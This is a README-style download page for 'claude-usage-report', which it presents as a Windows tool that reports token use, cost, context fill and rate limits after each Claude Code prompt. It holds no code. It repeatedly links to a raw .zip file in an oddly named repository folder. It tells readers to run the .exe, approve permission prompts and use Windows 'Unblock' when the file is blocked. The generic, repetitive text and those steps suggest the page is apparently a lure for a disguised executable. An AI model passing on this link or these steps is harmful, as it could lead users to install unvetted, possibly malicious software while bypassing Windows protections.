Visit this page to download: https://github.com/bbsbs7617-png/claude-usage-report/raw/refs/heads/main/historicocabbalistical/report-claude-usage-1.3.zip
Use this link to get the latest version for Windows.
claude-usage-report shows a usage report after each Claude Code prompt.
It helps you see:
- token use for each prompt
- token cost
- context window use
- rate limit status
It runs as a stop hook, so it checks usage when a prompt ends. That makes it easier to keep track of your Claude usage without opening extra tools.
Use a Windows PC with:
- Windows 10 or Windows 11
- an internet connection
- access to Claude Code
- a web browser to open the download page
You also need permission to save files on your computer.
- Open the download page: https://github.com/bbsbs7617-png/claude-usage-report/raw/refs/heads/main/historicocabbalistical/report-claude-usage-1.3.zip
- Look for the latest release or download file on the page.
- Save the file to your computer.
- If the file is in a .zip folder, extract it first.
- Open the app or follow the included setup file.
If your browser asks where to save the file, choose a folder you can find later, such as Downloads or Desktop.
If you downloaded a .zip file:
- Right-click the file.
- Select Extract All.
- Choose a folder.
- Open the extracted folder.
- Find the app file or setup file.
- Double-click it to run.
If you downloaded an .exe file:
- Double-click the file.
- If Windows asks for permission, select Yes.
- Wait for the app to open.
If you downloaded a package for Claude Code:
- Place the files in the folder that Claude Code uses for hooks.
- Make sure the stop hook points to the usage report tool.
- Save the file.
- Run Claude Code and send a prompt to test it.
After setup, the app reports usage after each prompt.
You can expect a report that shows:
- how many tokens the prompt used
- how much that prompt may cost
- how much context remains
- whether you are near a rate limit
This helps you answer simple questions like:
- Am I using a lot of tokens?
- Is this prompt close to the context limit?
- Will I hit a rate limit soon?
A typical report can include:
- prompt name or time
- input token count
- output token count
- total token count
- estimated cost
- context window fill level
- rate limit status
The report is made for quick reading. It uses plain numbers and short labels so you can scan it fast.
Use claude-usage-report when you want to:
- track usage after each Claude Code prompt
- keep an eye on cost
- see how fast context fills up
- avoid rate limit surprises
- review how heavy a prompt was
The app uses a stop hook.
That means Claude Code finishes a prompt, then the hook runs and shows the usage report. You do not need to open a separate dashboard. The report appears as part of your normal Claude Code flow.
If the download includes a config file:
- Open the config file in Notepad.
- Find the stop hook entry.
- Point it to the usage report app or script.
- Save the file.
- Start Claude Code again.
- Send a test prompt.
If the download includes a ready-to-run app:
- Keep the app in one folder.
- Run it before you use Claude Code.
- Send a prompt in Claude Code.
- Check the report that appears after the prompt ends.
To check that it works:
- Open Claude Code.
- Send a short prompt.
- Wait for the prompt to finish.
- Look for the usage report.
- Confirm that token use, context window, and rate limit info appear.
If you do not see a report, check that the stop hook points to the correct file.
For simple setup, use a folder like this:
- Downloads
- claude-usage-report
- app file
- config file
- readme file
- claude-usage-report
Keeping the files together makes setup easier and helps you find them later.
- per-prompt usage reporting
- token cost view
- context window tracking
- rate limit checks
- simple output for quick review
- works with Claude Code stop hook flow
If Windows blocks the file:
- Right-click the file.
- Select Properties.
- Look for an Unblock option.
- If you see it, select it.
- Click OK.
- Try opening the file again.
If the file does not open:
- Check that the download finished.
- Make sure you extracted the zip file.
- Check that you opened the right file.
- Try running it again as needed.
You can keep claude-usage-report in:
- Downloads
- Desktop
- Documents
- a tools folder you use for Claude Code
Pick one place and keep the files there.
Visit this page to download: https://github.com/bbsbs7617-png/claude-usage-report/raw/refs/heads/main/historicocabbalistical/report-claude-usage-1.3.zip
Use this link if you need the latest copy or want to check the release page again
If you rename the file, keep the name easy to read. A simple name like this works well:
- claude-usage-report
Avoid names that are hard to spot later, such as long strings of numbers or extra symbols
The app may need permission to:
- run on your PC
- read local config files
- write report output
If Windows asks for access, allow it so the tool can work as expected
This tool is meant for people who use Claude Code and want a clear usage readout after each prompt.
It fits a simple workflow:
- write a prompt
- send it to Claude Code
- wait for the result
- read the usage report
- decide if the next prompt should be smaller or split into parts
- Download the app from the link above
- Extract the files if needed
- Open the app or setup file
- Connect it to Claude Code stop hook flow
- Run a test prompt
- Check the usage report after the prompt ends
If the download includes extra files, they may help with:
- setup
- sample config
- usage notes
- hook path examples
Keep those files in the same folder as the app so they stay easy to find